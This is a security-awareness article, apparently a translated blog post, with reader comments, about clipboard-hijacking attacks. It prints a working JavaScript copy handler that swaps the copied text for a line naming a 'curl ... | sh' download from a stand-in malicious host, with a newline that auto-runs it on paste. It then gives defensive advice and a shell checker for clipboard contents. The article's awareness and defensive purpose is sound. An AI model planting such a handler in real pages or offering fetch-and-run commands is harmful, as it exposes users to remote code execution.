An unusual hacking demonstration will make you think twice before copying or pasting any text.
This is why you should NEVER copy and paste commands directly into your terminal. Ask any developer or administrator whether they have ever copied a command line or a code snippet from the web. The answer will probably be YES. You would assume that what you copied is what you paste, right? Well, no!
You think you're copying one thing, but it's replaced with something else, like malicious code. All it takes is a single line of code inserted into the code you copied to create a backdoor in your application.
This attack is very simple but can cause great damage. Let's see how it works in practice:
Thanks to Harel Friedlander for recording this video.
Suppose you are looking for how to update your Ubuntu system and you find the following command. Try it: copy and paste the following command:
$ sudo apt update
Here is the JavaScript on the page that performs the substitution:
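// Runs when the visitor copies the element with id "copyme".
document.getElementById('copyme').addEventListener('copy', function(e) {
    // Put the page's own text on the clipboard instead of the selection.
    // The trailing \n makes a terminal run the line as soon as it is pasted.
    e.clipboardData.setData('text/plain',
        'echo "τo sudo apt update έγινε [curl http://kakovoulo-site.com | sh]"\n'
    );
    // Cancel the browser's default copy so the substituted text is kept.
    e.preventDefault();
});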
How can I protect myself?
The safest way is not to paste anything from the web into your terminal. Another option is to type "#" before pasting: this turns the command into a comment, so it is not executed. That way you see what you are about to paste before your terminal runs it. You can of course also paste the command into a text file before putting it in your terminal.
Many terminals can also be configured not to run a pasted command automatically when the paste contains a "\n" (newline).
The above was just one example of why raising awareness is necessary to avoid an intrusion. There are many examples of really malicious scripts circulating on the internet.
The other alternative, of course, is to use an intermediate destination (e.g. a text editor), which will show what you really have in your clipboard.
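The "intermediate destination" check can also be scripted. The following is an added example, not code from the original article: a hypothetical shell function, check_paste, that compares the clipboard text with what you believe you selected and flags newlines, control characters and a download piped into a shell. The sample input is constructed and its host is a placeholder.

```sh
#!/bin/sh
# check_paste EXPECTED : the real clipboard text is read from stdin.
# Prints the text with control characters escaped, then the reasons not to
# paste it. Exit status: 0 = no findings, 1 = at least one finding.
check_paste() {
    expected=$1
    nl='
'
    # $(...) strips trailing newlines; the sentinel "x" preserves them.
    actual=$(cat; printf x)
    actual=${actual%x}
    findings=0

    echo "Clipboard really contains (sed 'l' notation, \$ marks end of line):"
    printf '%s' "$actual" | sed -n l

    if [ "$actual" != "$expected" ]; then
        echo "WARN: text differs from what was selected on the page"
        findings=1
    fi
    case $actual in
        *"$nl"*)
            echo "WARN: contains a newline, so a terminal may run it on paste"
            findings=1 ;;
    esac
    if printf '%s' "$actual" | tr -d '\n\t' | LC_ALL=C grep -q '[[:cntrl:]]'; then
        echo "WARN: contains control characters other than newline/tab"
        findings=1
    fi
    if printf '%s' "$actual" |
        grep -Eq '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|da|z)?sh'; then
        echo "WARN: pipes a download into a shell"
        findings=1
    fi
    return "$findings"
}

# Constructed sample: the kind of text the copy handler above substitutes
# (placeholder host), checked against the command the reader thought they copied.
printf 'echo "sudo apt update became [curl http://example.invalid | sh]"\n' |
    check_paste 'sudo apt update' || echo "=> do not paste this"
```

On X11 the clipboard can be fed in with `xclip -o -selection clipboard | check_paste 'sudo apt update'`; other desktops have their own clipboard-reading tool.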
A humble thank you!
Good evening, Happy Birthday and Happy New Year!!
I would like to thank you first for your informative articles.
Another solution that solves the above problem works in Firefox: about:config >> dom.event.clipboardevents.enabled >> false.
A friend of the most customizable browser in the world.
Happy new year, thank you for adding